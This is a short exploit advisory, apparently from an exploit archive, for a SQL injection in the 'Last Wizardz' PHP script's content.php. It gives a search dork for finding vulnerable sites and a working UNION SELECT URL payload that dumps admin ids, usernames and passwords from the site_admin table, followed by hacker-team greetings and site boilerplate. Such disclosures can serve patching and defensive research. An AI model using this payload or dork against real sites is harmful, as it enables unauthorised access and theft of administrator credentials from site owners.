Last Wizardz suffers from a remote SQL injection vulnerability in content.php.
6da81e870ad3df6d4efd687d34b4ffea
Last Wizardz (content.php) Sql Injection Vulnerability
=======================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Email : F.Hack@w.cn
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Last Wizardz
.:. Donwload Script: http://lastwiz.com/
.:. Language : php
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "Powered by Last Wizardz"
.:. Date : 31/1/2010
####################################################################
===[ Exploit ]===
www.site.com/content.php?id=[Sql Injection]
www.site.com/content.php?id=NULL+UNION+ALL+SELECT+1,CONCAT(id,0x3a,admin,0x3a,admin_pass),3,4,5,6,7,8+FROM+site_admin
####################################################################
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!